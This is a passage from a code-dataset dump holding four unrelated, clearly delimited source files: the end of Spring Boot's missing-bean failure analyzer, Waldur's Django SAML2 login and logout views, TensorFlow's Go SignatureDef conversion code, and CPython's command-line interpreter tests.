			return Collections.emptyList();
		}
		String[] beanNames = BeanFactoryUtils.beanNamesForTypeIncludingAncestors(this.beanFactory, type);
		return Arrays.stream(beanNames)
			.map((beanName) -> new UserConfigurationResult(getFactoryMethodMetadata(beanName),
					// NOTE(review): .equals(null) appears to rely on Spring's
					// NullBean equals contract to detect a @Bean method that
					// returned null — confirm before changing.
					this.beanFactory.getBean(beanName).equals(null)))
			.toList();
	}

	private @Nullable MethodMetadata getFactoryMethodMetadata(String beanName) {
		BeanDefinition beanDefinition = this.beanFactory.getBeanDefinition(beanName);
		if (beanDefinition instanceof AnnotatedBeanDefinition annotatedBeanDefinition) {
			return annotatedBeanDefinition.getFactoryMethodMetadata();
		}
		return null;
	}

	private void collectReportedConditionOutcomes(NoSuchBeanDefinitionException cause,
			List<AutoConfigurationResult> results) {
		this.report.getConditionAndOutcomesBySource()
			.forEach((source, sourceOutcomes) -> collectReportedConditionOutcomes(cause, new Source(source),
					sourceOutcomes, results));
	}

	private void collectReportedConditionOutcomes(NoSuchBeanDefinitionException cause, Source source,
			ConditionAndOutcomes sourceOutcomes, List<AutoConfigurationResult> results) {
		// A full match means the source was applied; it cannot explain a
		// missing bean.
		if (sourceOutcomes.isFullMatch()) {
			return;
		}
		BeanMethods methods = new BeanMethods(source, cause);
		for (ConditionAndOutcome conditionAndOutcome : sourceOutcomes) {
			if (!conditionAndOutcome.getOutcome().isMatch()) {
				for (MethodMetadata method : methods) {
					results.add(new AutoConfigurationResult(method, conditionAndOutcome.getOutcome()));
				}
			}
		}
	}

	private void collectExcludedAutoConfiguration(NoSuchBeanDefinitionException cause,
			List<AutoConfigurationResult> results) {
		for (String excludedClass : this.report.getExclusions()) {
			Source source = new Source(excludedClass);
			BeanMethods methods = new BeanMethods(source, cause);
			for (MethodMetadata method : methods) {
				String message = String.format("auto-configuration '%s' was excluded",
						ClassUtils.getShortName(excludedClass));
				results.add(new AutoConfigurationResult(method, new ConditionOutcome(false, message)));
			}
		}
	}

	private @Nullable InjectionPoint findInjectionPoint(Throwable failure) {
		UnsatisfiedDependencyException unsatisfiedDependencyException = findCause(failure,
				UnsatisfiedDependencyException.class);
		if (unsatisfiedDependencyException == null) {
			return null;
		}
		return unsatisfiedDependencyException.getInjectionPoint();
	}

	// Parses a condition report source of the form "com.example.Config" or
	// "com.example.Config#beanMethod".
	private static class Source {

		private final String className;

		private final @Nullable String methodName;

		Source(String source) {
			String[] tokens = source.split("#");
			this.className = (tokens.length > 1) ? tokens[0] : source;
			this.methodName = (tokens.length != 2) ? null : tokens[1];
		}

		String getClassName() {
			return this.className;
		}

		@Nullable String getMethodName() {
			return this.methodName;
		}

	}

	// The @Bean methods of a source class that could have produced the
	// missing bean (matched by name or by assignable return type).
	private class BeanMethods implements Iterable<MethodMetadata> {

		private final List<MethodMetadata> methods;

		BeanMethods(Source source, NoSuchBeanDefinitionException cause) {
			this.methods = findBeanMethods(source, cause);
		}

		private List<MethodMetadata> findBeanMethods(Source source, NoSuchBeanDefinitionException cause) {
			try {
				MetadataReader classMetadata = NoSuchBeanDefinitionFailureAnalyzer.this.metadataReaderFactory
					.getMetadataReader(source.getClassName());
				Set<MethodMetadata> candidates = classMetadata.getAnnotationMetadata()
					.getAnnotatedMethods(Bean.class.getName());
				List<MethodMetadata> result = new ArrayList<>();
				for (MethodMetadata candidate : candidates) {
					if (isMatch(candidate, source, cause)) {
						result.add(candidate);
					}
				}
				return Collections.unmodifiableList(result);
			}
			catch (Exception ex) {
				// Best effort: unreadable metadata just means no candidates.
				return Collections.emptyList();
			}
		}

		private boolean isMatch(MethodMetadata candidate, Source source, NoSuchBeanDefinitionException cause) {
			if (source.getMethodName() != null && !source.getMethodName().equals(candidate.getMethodName())) {
				return false;
			}
			String name = cause.getBeanName();
			ResolvableType resolvableType = cause.getResolvableType();
			return ((name != null && hasName(candidate, name))
					|| (resolvableType != null && hasType(candidate, extractBeanType(resolvableType))));
		}

		private boolean hasName(MethodMetadata methodMetadata, String name) {
			Map<String, @Nullable Object> attributes = methodMetadata.getAnnotationAttributes(Bean.class.getName());
			String[] candidates = (attributes != null) ? (String[]) attributes.get("name") : null;
			if (candidates != null) {
				for (String candidate : candidates) {
					if (candidate.equals(name)) {
						return true;
					}
				}
				return false;
			}
			// No explicit @Bean name: the bean name defaults to the method name.
			return methodMetadata.getMethodName().equals(name);
		}

		private boolean hasType(MethodMetadata candidate, Class<?> type) {
			String returnTypeName = candidate.getReturnTypeName();
			if (type.getName().equals(returnTypeName)) {
				return true;
			}
			try {
				Class<?> returnType = ClassUtils.forName(returnTypeName,
						NoSuchBeanDefinitionFailureAnalyzer.this.beanFactory.getBeanClassLoader());
				return type.isAssignableFrom(returnType);
			}
			catch (Throwable ex) {
				return false;
			}
		}

		@Override
		public Iterator<MethodMetadata> iterator() {
			return this.methods.iterator();
		}

	}

	// One auto-configured @Bean method that was not applied, plus the
	// condition outcome explaining why.
	private static class AutoConfigurationResult {

		private final MethodMetadata methodMetadata;

		private final ConditionOutcome conditionOutcome;

		AutoConfigurationResult(MethodMetadata methodMetadata, ConditionOutcome conditionOutcome) {
			this.methodMetadata = methodMetadata;
			this.conditionOutcome = conditionOutcome;
		}

		@Override
		public String toString() {
			return String.format("Bean method '%s' in '%s' not loaded because %s", this.methodMetadata.getMethodName(),
					ClassUtils.getShortName(this.methodMetadata.getDeclaringClassName()),
					this.conditionOutcome.getMessage());
		}

	}

	// A user-defined bean of the requested type, typically one whose factory
	// method produced a null value.
	private static class UserConfigurationResult {

		private final @Nullable MethodMetadata methodMetadata;

		private final boolean nullBean;

		UserConfigurationResult(@Nullable MethodMetadata methodMetadata, boolean nullBean) {
			this.methodMetadata = methodMetadata;
			this.nullBean = nullBean;
		}

		@Override
		public String toString() {
			StringBuilder sb = new StringBuilder("User-defined bean");
			if (this.methodMetadata != null) {
				sb.append(String.format(" method '%s' in '%s'", this.methodMetadata.getMethodName(),
						ClassUtils.getShortName(this.methodMetadata.getDeclaringClassName())));
			}
			if (this.nullBean) {
				sb.append(" ignored as the bean value is null");
			}
			return sb.toString();
		}

	}

}
|
java
|
github
|
https://github.com/spring-projects/spring-boot
|
core/spring-boot-autoconfigure/src/main/java/org/springframework/boot/autoconfigure/diagnostics/analyzer/NoSuchBeanDefinitionFailureAnalyzer.java
|
import base64
import logging
from django.conf import settings
from django.contrib import auth
from django.core.exceptions import ValidationError
from django.http import HttpResponse, HttpResponseRedirect, JsonResponse
from django.utils.six import text_type
from django.utils.translation import ugettext_lazy as _
from djangosaml2.cache import IdentityCache, OutstandingQueriesCache, StateCache
from djangosaml2.conf import get_config
from djangosaml2.signals import post_authenticated
from djangosaml2.utils import get_custom_setting, get_location
from djangosaml2.views import _get_subject_id, _set_subject_id
from rest_framework.authtoken.models import Token
from rest_framework.generics import ListAPIView
from rest_framework.views import APIView
from saml2 import BINDING_HTTP_POST, BINDING_HTTP_REDIRECT, md
from saml2.client import Saml2Client
from saml2.metadata import do_extensions, entity_descriptor
from saml2.response import StatusRequestDenied
from saml2.xmldsig import DIGEST_SHA1, SIG_RSA_SHA1
from waldur_core.core.views import (
RefreshTokenMixin,
login_completed,
login_failed,
logout_completed,
logout_failed,
validate_authentication_method,
)
from . import filters, models, serializers, utils
from .log import event_logger
# Module-level logger for this views module.
logger = logging.getLogger(__name__)
# Decorator guarding the SAML2 views; presumably it rejects requests when
# SAML2 is not an enabled authentication method — see
# waldur_core.core.views.validate_authentication_method.
validate_saml2 = validate_authentication_method('SAML2')
def metadata(request, config_loader_path=None, valid_for=None):
    """Returns an XML with the SAML 2.0 metadata for this
    SP as configured in the settings.py file.
    """
    conf = get_config(config_loader_path, request)
    descriptor = entity_descriptor(conf)
    if conf.extensions:
        # Merge any configured extension elements into the descriptor.
        if descriptor.extensions is None:
            descriptor.extensions = md.Extensions()
        for key, val in conf.extensions.items():
            for element in do_extensions(key, val) or []:
                descriptor.extensions.add_extension_element(element)
    return HttpResponse(
        content=text_type(descriptor).encode('utf-8'),
        content_type="text/xml; charset=utf8",
    )
class BaseSaml2View(APIView):
    """Base class for the SAML2 endpoints: they must be reachable by
    anonymous users, so throttling, permissions and authentication are
    all disabled."""
    throttle_classes = ()
    permission_classes = ()
    authentication_classes = ()
class Saml2LoginView(BaseSaml2View):
    """
    SAML Authorization endpoint
    This view receives authorization requests from users and
    redirects them to corresponding IdP authorization page.
    The "metadata" has to be set in SAML_CONFIG in settings.py
    """

    serializer_class = serializers.Saml2LoginSerializer

    @validate_saml2
    def post(self, request):
        """Start a login flow against the requested IdP and return either a
        redirect URL or a self-submitting POST payload."""
        if not self.request.user.is_anonymous:
            error_message = _('This endpoint is for anonymous users only.')
            return JsonResponse({'error_message': error_message}, status=400)
        serializer = self.serializer_class(data=request.data)
        serializer.is_valid(raise_exception=True)
        idp = serializer.validated_data.get('idp')
        conf = get_config(request=request)
        # ensure our selected binding is supported by the IDP
        supported_bindings = utils.get_idp_sso_supported_bindings(idp, config=conf)
        default_binding = settings.WALDUR_AUTH_SAML2.get('DEFAULT_BINDING')
        # Preference order: configured default, then POST, then redirect.
        if default_binding in supported_bindings:
            binding = default_binding
        elif BINDING_HTTP_POST in supported_bindings:
            binding = BINDING_HTTP_POST
        elif BINDING_HTTP_REDIRECT in supported_bindings:
            binding = BINDING_HTTP_REDIRECT
        else:
            error_message = _('Identity provider does not support available bindings.')
            return JsonResponse({'error_message': error_message}, status=400)
        client = Saml2Client(conf)
        kwargs = {}
        sign_requests = getattr(conf, '_sp_authn_requests_signed', False)
        if sign_requests:
            # Fall back to SHA1-based algorithms when none are configured.
            signature_algorithm = (
                settings.WALDUR_AUTH_SAML2.get('signature_algorithm') or SIG_RSA_SHA1
            )
            digest_algorithm = (
                settings.WALDUR_AUTH_SAML2.get('digest_algorithm') or DIGEST_SHA1
            )
            kwargs['sign'] = True
            kwargs['sigalg'] = signature_algorithm
            kwargs['sign_alg'] = signature_algorithm
            kwargs['digest_alg'] = digest_algorithm
        nameid_format = settings.WALDUR_AUTH_SAML2.get('nameid_format')
        if nameid_format or nameid_format == "":  # "" is a valid setting in pysaml2
            kwargs['nameid_format'] = nameid_format
        if binding == BINDING_HTTP_REDIRECT:
            session_id, result = client.prepare_for_authenticate(
                entityid=idp, binding=binding, **kwargs
            )
            data = {
                'binding': 'redirect',
                'url': get_location(result),
            }
        elif binding == BINDING_HTTP_POST:
            try:
                location = client.sso_location(idp, binding)
            except TypeError:
                error_message = _('Invalid identity provider specified.')
                return JsonResponse({'error_message': error_message}, status=400)
            session_id, request_xml = client.create_authn_request(
                location, binding=binding, **kwargs
            )
            data = {
                'binding': 'post',
                'url': location,
                'request': str(base64.b64encode(request_xml.encode('UTF-8')), 'utf-8'),
            }
        # save session_id
        oq_cache = OutstandingQueriesCache(request.session)
        oq_cache.set(session_id, '')
        return JsonResponse(data)
class Saml2LoginCompleteView(RefreshTokenMixin, BaseSaml2View):
    """
    SAML Authorization Response endpoint
    The IdP will send its response to this view, which
    will process it with pysaml2 help and log the user
    in using the custom Authorization backend
    djangosaml2.backends.Saml2Backend that should be
    enabled in the settings.py
    """

    serializer_class = serializers.Saml2LoginCompleteSerializer

    @validate_saml2
    def post(self, request):
        """Validate the IdP's SAML response, authenticate the user and hand
        back a fresh API token."""
        serializer = self.serializer_class(data=request.data)
        serializer.is_valid(raise_exception=True)
        attribute_mapping = get_custom_setting(
            'SAML_ATTRIBUTE_MAPPING', {'uid': ('username',)}
        )
        create_unknown_user = get_custom_setting('SAML_CREATE_UNKNOWN_USER', True)
        conf = get_config(request=request)
        client = Saml2Client(conf, identity_cache=IdentityCache(request.session))
        oq_cache = OutstandingQueriesCache(request.session)
        outstanding_queries = oq_cache.outstanding_queries()
        xmlstr = serializer.validated_data['SAMLResponse']
        # process the authentication response
        try:
            response = client.parse_authn_request_response(
                xmlstr, BINDING_HTTP_POST, outstanding_queries
            )
        except Exception as e:
            # An explicit denial from the IdP gets a friendlier message than
            # a generic parse failure.
            if isinstance(e, StatusRequestDenied):
                return login_failed(
                    _(
                        'Authentication request has been denied by identity provider. '
                        'Please check your credentials.'
                    )
                )
            logger.error('SAML response parsing failed %s' % e)
            return login_failed(_('SAML2 response has errors.'))
        if response is None:
            logger.error('SAML response is None')
            return login_failed(_('SAML response has errors. Please check the logs'))
        if response.assertion is None:
            logger.error('SAML response assertion is None')
            return login_failed(_('SAML response has errors. Please check the logs'))
        # The outstanding query is consumed once the response is accepted.
        session_id = response.session_id()
        oq_cache.delete(session_id)
        # authenticate the remote user
        session_info = response.session_info()
        # Both settings may be given as callables; resolve them before use.
        if callable(attribute_mapping):
            attribute_mapping = attribute_mapping()
        if callable(create_unknown_user):
            create_unknown_user = create_unknown_user()
        try:
            user = auth.authenticate(
                request=request,  # AxesBackend requires request for authentication
                session_info=session_info,
                attribute_mapping=attribute_mapping,
                create_unknown_user=create_unknown_user,
            )
        except ValidationError as e:
            return login_failed(e.message)
        if user is None:
            return login_failed(_('SAML2 authentication failed.'))
        # Record how this account authenticates.
        registration_method = settings.WALDUR_AUTH_SAML2.get('name', 'saml2')
        if user.registration_method != registration_method:
            user.registration_method = registration_method
            user.save(update_fields=['registration_method'])
        # required for validating SAML2 logout requests
        auth.login(request, user)
        _set_subject_id(request.session, session_info['name_id'])
        logger.debug('User %s authenticated via SSO.', user)
        logger.debug('Sending the post_authenticated signal')
        post_authenticated.send_robust(sender=user, session_info=session_info)
        token = self.refresh_token(user)
        logger.info(
            'Authenticated with SAML token. Returning token for successful login of user %s',
            user,
        )
        event_logger.saml2_auth.info(
            'User {user_username} with full name {user_full_name} logged in successfully with SAML2.',
            event_type='auth_logged_in_with_saml2',
            event_context={'user': user},
        )
        return login_completed(token.key, 'saml2')
class Saml2LogoutView(BaseSaml2View):
    """
    SAML Logout endpoint
    This view redirects users to corresponding IdP page for the logout.
    """

    @validate_saml2
    def get(self, request):
        """Initiate a global logout at the IdP and redirect the user there."""
        state = StateCache(request.session)
        conf = get_config(request=request)
        client = Saml2Client(
            conf, state_cache=state, identity_cache=IdentityCache(request.session)
        )
        subject_id = _get_subject_id(request.session)
        if subject_id is None:
            return logout_failed(_('You cannot be logged out.'))
        try:
            result = client.global_logout(subject_id)
        except KeyError:
            return logout_failed(_('You are not logged in any IdP/AA.'))
        # Persist pysaml2's state before leaving this request.
        state.sync()
        if not result:
            return logout_failed(_('You are not logged in any IdP/AA.'))
        # Logout is supported only from 1 IdP
        binding, http_info = list(result.values())[0]
        return HttpResponseRedirect(get_location(http_info))
class Saml2LogoutCompleteView(BaseSaml2View):
    """
    SAML Logout Response endpoint
    The IdP will send its response to this view, which
    will logout the user and remove authorization token.
    """

    serializer_class = serializers.Saml2LogoutCompleteSerializer

    @validate_saml2
    def get(self, request):
        """
        For IdPs which send GET requests
        """
        serializer = self.serializer_class(data=request.GET)
        serializer.is_valid(raise_exception=True)
        return self.logout(request, serializer.validated_data, BINDING_HTTP_REDIRECT)

    @validate_saml2
    def post(self, request):
        """
        For IdPs which send POST requests
        """
        serializer = self.serializer_class(data=request.POST)
        serializer.is_valid(raise_exception=True)
        return self.logout(request, serializer.validated_data, BINDING_HTTP_POST)

    def logout(self, request, data, binding):
        """Finish the logout flow (whether we or the IdP initiated it), then
        drop the local session and the user's API token."""
        conf = get_config(request=request)
        state = StateCache(request.session)
        client = Saml2Client(
            conf, state_cache=state, identity_cache=IdentityCache(request.session)
        )
        if 'SAMLResponse' in data:
            # Logout started by us
            client.parse_logout_request_response(data['SAMLResponse'], binding)
            http_response = logout_completed()
        else:
            # Logout started by IdP
            subject_id = _get_subject_id(request.session)
            if subject_id is None:
                http_response = logout_completed()
            else:
                http_info = client.handle_logout_request(
                    data['SAMLRequest'],
                    subject_id,
                    binding,
                    relay_state=data.get('RelayState', ''),
                )
                http_response = HttpResponseRedirect(get_location(http_info))
        state.sync()
        user = request.user
        if user.is_anonymous:
            return http_response
        # filter().delete() instead of get().delete(): a user without a token
        # (e.g. already logged out elsewhere) must not raise Token.DoesNotExist
        # and turn a successful logout into a 500.
        Token.objects.filter(user=user).delete()
        auth.logout(request)
        event_logger.saml2_auth.info(
            'User {user_username} with full name {user_full_name} logged out successfully with SAML2.',
            event_type='auth_logged_out_with_saml2',
            event_context={'user': user},
        )
        return http_response
class Saml2ProviderView(ListAPIView):
    """Read-only, unauthenticated listing of the known SAML2 identity
    providers, filterable via IdentityProviderFilter."""
    throttle_classes = ()
    permission_classes = ()
    serializer_class = serializers.Saml2ProviderSerializer
    queryset = models.IdentityProvider.objects.all()
    filterset_class = filters.IdentityProviderFilter
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
Copyright 2019 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package tensorflow
import corepb "github.com/tensorflow/tensorflow/tensorflow/go/core/protobuf/for_core_protos_go_proto"
// #include "tensorflow/c/c_api.h"
import "C"
// A Signature defines the signature of a computation supported by a TensorFlow
// graph.
//
// For example, a model with two loss computations, sharing a single input,
// might have the following signature_def map.
//
// Note that across the two Signatures "loss_A" and "loss_B", the input key,
// output key, and method_name are identical, and will be used by system(s) that
// implement or rely upon this particular loss method. The output tensor names
// differ, demonstrating how different outputs can exist for the same method.
//
// signature_def {
// key: "loss_A"
// value {
// inputs {
// key: "input"
// value {
// name: "input:0"
// dtype: DT_STRING
// tensor_shape: ...
// }
// }
// outputs {
// key: "loss_output"
// value {
// name: "loss_output_A:0"
// dtype: DT_FLOAT
// tensor_shape: ...
// }
// }
// }
// ...
// method_name: "some/package/compute_loss"
// }
// signature_def {
// key: "loss_B"
// value {
// inputs {
// key: "input"
// value {
// name: "input:0"
// dtype: DT_STRING
// tensor_shape: ...
// }
// }
// outputs {
// key: "loss_output"
// value {
// name: "loss_output_B:0"
// dtype: DT_FLOAT
// tensor_shape: ...
// }
// }
// }
// ...
// method_name: "some/package/compute_loss"
// }
type Signature struct {
	// Inputs and Outputs map the signature's logical tensor names to the
	// TensorInfo needed to feed or fetch the corresponding tensor.
	Inputs, Outputs map[string]TensorInfo
	// MethodName identifies the method this signature implements
	// (e.g. "some/package/compute_loss" in the example above).
	MethodName string
}
// A TensorInfo contains the information about a Tensor necessary for feeding or retrieval.
type TensorInfo struct {
	Name  string   // name of the tensor in the graph, e.g. "input:0"
	DType DataType // element type of the tensor
	Shape Shape    // shape recorded in the signature
}
// signatureDefFromProto converts a SignatureDef protocol buffer into its Go
// representation, translating each input and output TensorInfo.
func signatureDefFromProto(pb *corepb.SignatureDef) Signature {
	sig := Signature{
		Inputs:     make(map[string]TensorInfo),
		Outputs:    make(map[string]TensorInfo),
		MethodName: pb.GetMethodName(),
	}
	for name, info := range pb.GetInputs() {
		sig.Inputs[name] = tensorInfoFromProto(info)
	}
	for name, info := range pb.GetOutputs() {
		sig.Outputs[name] = tensorInfoFromProto(info)
	}
	return sig
}
// tensorInfoFromProto converts a TensorInfo protocol buffer into its Go
// representation.
func tensorInfoFromProto(pb *corepb.TensorInfo) TensorInfo {
	// Collect the dimension sizes from the shape proto (nil slice when the
	// shape has no dimensions, matching MakeShape's variadic form).
	var dims []int64
	for _, dim := range pb.GetTensorShape().GetDim() {
		dims = append(dims, dim.GetSize())
	}
	info := TensorInfo{
		Name:  pb.GetName(),
		DType: DataType(C.TF_DataType(pb.GetDtype())),
		Shape: MakeShape(dims...),
	}
	return info
}
|
go
|
github
|
https://github.com/tensorflow/tensorflow
|
tensorflow/go/signature.go
|
# Tests invocation of the interpreter with various command line arguments
# Most tests are executed with environment variables ignored
# See test_cmd_line_script.py for testing of script execution
import test.support, unittest
import os
import sys
import subprocess
import tempfile
from test.script_helper import spawn_python, kill_python, assert_python_ok, assert_python_failure
# XXX (ncoghlan): Move to script_helper and make consistent with run_python
def _kill_python_and_exit_code(p):
    """Terminate the spawned interpreter *p* and return (output, exit code)."""
    output = kill_python(p)
    return output, p.wait()
class CmdLineTest(unittest.TestCase):
    def test_directories(self):
        # Passing a directory as the script (or via stdin redirection syntax)
        # must make the interpreter exit with a failure, not crash.
        assert_python_failure('.')
        assert_python_failure('< .')
def verify_valid_flag(self, cmd_line):
rc, out, err = assert_python_ok(*cmd_line)
self.assertTrue(out == b'' or out.endswith(b'\n'))
self.assertNotIn(b'Traceback', out)
self.assertNotIn(b'Traceback', err)
def test_optimize(self):
self.verify_valid_flag('-O')
self.verify_valid_flag('-OO')
def test_q(self):
self.verify_valid_flag('-Qold')
self.verify_valid_flag('-Qnew')
self.verify_valid_flag('-Qwarn')
self.verify_valid_flag('-Qwarnall')
def test_site_flag(self):
self.verify_valid_flag('-S')
def test_usage(self):
rc, out, err = assert_python_ok('-h')
self.assertIn(b'usage', out)
def test_version(self):
version = ('Python %d.%d' % sys.version_info[:2]).encode("ascii")
rc, out, err = assert_python_ok('-V')
self.assertTrue(err.startswith(version))
def test_verbose(self):
# -v causes imports to write to stderr. If the write to
# stderr itself causes an import to happen (for the output
# codec), a recursion loop can occur.
rc, out, err = assert_python_ok('-v')
self.assertNotIn(b'stack overflow', err)
rc, out, err = assert_python_ok('-vv')
self.assertNotIn(b'stack overflow', err)
def test_xoptions(self):
rc, out, err = assert_python_ok('-c', 'import sys; print(sys._xoptions)')
opts = eval(out.splitlines()[0])
self.assertEqual(opts, {})
rc, out, err = assert_python_ok(
'-Xa', '-Xb=c,d=e', '-c', 'import sys; print(sys._xoptions)')
opts = eval(out.splitlines()[0])
self.assertEqual(opts, {'a': True, 'b': 'c,d=e'})
def test_run_module(self):
# Test expected operation of the '-m' switch
# Switch needs an argument
assert_python_failure('-m')
# Check we get an error for a nonexistent module
assert_python_failure('-m', 'fnord43520xyz')
# Check the runpy module also gives an error for
# a nonexistent module
assert_python_failure('-m', 'runpy', 'fnord43520xyz'),
# All good if module is located and run successfully
assert_python_ok('-m', 'timeit', '-n', '1'),
def test_run_module_bug1764407(self):
# -m and -i need to play well together
# Runs the timeit module and checks the __main__
# namespace has been populated appropriately
p = spawn_python('-i', '-m', 'timeit', '-n', '1')
p.stdin.write(b'Timer\n')
p.stdin.write(b'exit()\n')
data = kill_python(p)
self.assertTrue(data.find(b'1 loop') != -1)
self.assertTrue(data.find(b'__main__.Timer') != -1)
def test_run_code(self):
# Test expected operation of the '-c' switch
# Switch needs an argument
assert_python_failure('-c')
# Check we get an error for an uncaught exception
assert_python_failure('-c', 'raise Exception')
# All good if execution is successful
assert_python_ok('-c', 'pass')
@unittest.skipIf(sys.getfilesystemencoding() == 'ascii',
'need a filesystem encoding different than ASCII')
def test_non_ascii(self):
# Test handling of non-ascii data
if test.support.verbose:
import locale
print('locale encoding = %s, filesystem encoding = %s'
% (locale.getpreferredencoding(), sys.getfilesystemencoding()))
command = "assert(ord('\xe9') == 0xe9)"
assert_python_ok('-c', command)
# On Windows, pass bytes to subprocess doesn't test how Python decodes the
# command line, but how subprocess does decode bytes to unicode. Python
# doesn't decode the command line because Windows provides directly the
# arguments as unicode (using wmain() instead of main()).
@unittest.skipIf(sys.platform == 'win32',
'Windows has a native unicode API')
def test_undecodable_code(self):
undecodable = b"\xff"
env = os.environ.copy()
# Use C locale to get ascii for the locale encoding
env['LC_ALL'] = 'C'
code = (
b'import locale; '
b'print(ascii("' + undecodable + b'"), '
b'locale.getpreferredencoding())')
p = subprocess.Popen(
[sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
env=env)
stdout, stderr = p.communicate()
if p.returncode == 1:
# _Py_char2wchar() decoded b'\xff' as '\udcff' (b'\xff' is not
# decodable from ASCII) and run_command() failed on
# PyUnicode_AsUTF8String(). This is the expected behaviour on
# Linux.
pattern = b"Unable to decode the command from the command line:"
elif p.returncode == 0:
# _Py_char2wchar() decoded b'\xff' as '\xff' even if the locale is
# C and the locale encoding is ASCII. It occurs on FreeBSD, Solaris
# and Mac OS X.
pattern = b"'\\xff' "
# The output is followed by the encoding name, an alias to ASCII.
# Examples: "US-ASCII" or "646" (ISO 646, on Solaris).
else:
raise AssertionError("Unknown exit code: %s, output=%a" % (p.returncode, stdout))
if not stdout.startswith(pattern):
raise AssertionError("%a doesn't start with %a" % (stdout, pattern))
@unittest.skipUnless(sys.platform == 'darwin', 'test specific to Mac OS X')
def test_osx_utf8(self):
def check_output(text):
decoded = text.decode('utf8', 'surrogateescape')
expected = ascii(decoded).encode('ascii') + b'\n'
env = os.environ.copy()
# C locale gives ASCII locale encoding, but Python uses UTF-8
# to parse the command line arguments on Mac OS X
env['LC_ALL'] = 'C'
p = subprocess.Popen(
(sys.executable, "-c", "import sys; print(ascii(sys.argv[1]))", text),
stdout=subprocess.PIPE,
env=env)
stdout, stderr = p.communicate()
self.assertEqual(stdout, expected)
self.assertEqual(p.returncode, 0)
# test valid utf-8
text = 'e:\xe9, euro:\u20ac, non-bmp:\U0010ffff'.encode('utf-8')
check_output(text)
# test invalid utf-8
text = (
b'\xff' # invalid byte
b'\xc3\xa9' # valid utf-8 character
b'\xc3\xff' # invalid byte sequence
b'\xed\xa0\x80' # lone surrogate character (invalid)
)
check_output(text)
def test_unbuffered_output(self):
# Test expected operation of the '-u' switch
for stream in ('stdout', 'stderr'):
# Binary is unbuffered
code = ("import os, sys; sys.%s.buffer.write(b'x'); os._exit(0)"
% stream)
rc, out, err = assert_python_ok('-u', '-c', code)
data = err if stream == 'stderr' else out
self.assertEqual(data, b'x', "binary %s not unbuffered" % stream)
# Text is line-buffered
code = ("import os, sys; sys.%s.write('x\\n'); os._exit(0)"
% stream)
rc, out, err = assert_python_ok('-u', '-c', code)
data = err if stream == 'stderr' else out
self.assertEqual(data.strip(), b'x',
"text %s not line-buffered" % stream)
def test_unbuffered_input(self):
# sys.stdin still works with '-u'
code = ("import sys; sys.stdout.write(sys.stdin.read(1))")
p = spawn_python('-u', '-c', code)
p.stdin.write(b'x')
p.stdin.flush()
data, rc = _kill_python_and_exit_code(p)
self.assertEqual(rc, 0)
self.assertTrue(data.startswith(b'x'), data)
def test_large_PYTHONPATH(self):
path1 = "ABCDE" * 100
path2 = "FGHIJ" * 100
path = path1 + os.pathsep + path2
code = """if 1:
import sys
path = ":".join(sys.path)
path = path.encode("ascii", "backslashreplace")
sys.stdout.buffer.write(path)"""
rc, out, err = assert_python_ok('-S', '-c', code,
PYTHONPATH=path)
self.assertIn(path1.encode('ascii'), out)
self.assertIn(path2.encode('ascii'), out)
def test_displayhook_unencodable(self):
for encoding in ('ascii', 'latin1', 'utf8'):
env = os.environ.copy()
env['PYTHONIOENCODING'] = encoding
p = subprocess.Popen(
[sys.executable, '-i'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env)
# non-ascii, surrogate, non-BMP printable, non-BMP unprintable
text = "a=\xe9 b=\uDC80 c=\U00010000 d=\U0010FFFF"
p.stdin.write(ascii(text).encode('ascii') + b"\n")
p.stdin.write(b'exit()\n')
data = kill_python(p)
escaped = repr(text).encode(encoding, 'backslashreplace')
self.assertIn(escaped, data)
def check_input(self, code, expected):
with tempfile.NamedTemporaryFile("wb+") as stdin:
sep = os.linesep.encode('ASCII')
stdin.write(sep.join((b'abc', b'def')))
stdin.flush()
stdin.seek(0)
with subprocess.Popen(
(sys.executable, "-c", code),
stdin=stdin, stdout=subprocess.PIPE) as proc:
stdout, stderr = proc.communicate()
self.assertEqual(stdout.rstrip(), expected)
def test_stdin_readline(self):
# Issue #11272: check that sys.stdin.readline() replaces '\r\n' by '\n'
# on Windows (sys.stdin is opened in binary mode)
self.check_input(
"import sys; print(repr(sys.stdin.readline()))",
b"'abc\\n'")
def test_builtin_input(self):
# Issue #11272: check that input() strips newlines ('\n' or '\r\n')
self.check_input(
"print(repr(input()))",
b"'abc'")
def test_unmached_quote(self):
# Issue #10206: python program starting with unmatched quote
# spewed spaces to stdout
rc, out, err = assert_python_failure('-c', "'")
self.assertRegex(err.decode('ascii', 'ignore'), 'SyntaxError')
self.assertEqual(b'', out)
def test_stdout_flush_at_shutdown(self):
# Issue #5319: if stdout.flush() fails at shutdown, an error should
# be printed out.
code = """if 1:
import os, sys
sys.stdout.write('x')
os.close(sys.stdout.fileno())"""
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(b'', out)
self.assertRegex(err.decode('ascii', 'ignore'),
'Exception IOError: .* ignored')
def test_closed_stdout(self):
# Issue #13444: if stdout has been explicitly closed, we should
# not attempt to flush it at shutdown.
code = "import sys; sys.stdout.close()"
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(b'', err)
# Issue #7111: Python should work without standard streams
@unittest.skipIf(os.name != 'posix', "test needs POSIX semantics")
def _test_no_stdio(self, streams):
code = """if 1:
import os, sys
for i, s in enumerate({streams}):
if getattr(sys, s) is not None:
os._exit(i + 1)
os._exit(42)""".format(streams=streams)
def preexec():
if 'stdin' in streams:
os.close(0)
if 'stdout' in streams:
os.close(1)
if 'stderr' in streams:
os.close(2)
p = subprocess.Popen(
[sys.executable, "-E", "-c", code],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=preexec)
out, err = p.communicate()
self.assertEqual(test.support.strip_python_stderr(err), b'')
self.assertEqual(p.returncode, 42)
def test_no_stdin(self):
self._test_no_stdio(['stdin'])
def test_no_stdout(self):
self._test_no_stdio(['stdout'])
def test_no_stderr(self):
self._test_no_stdio(['stderr'])
def test_no_std_streams(self):
self._test_no_stdio(['stdin', 'stdout', 'stderr'])
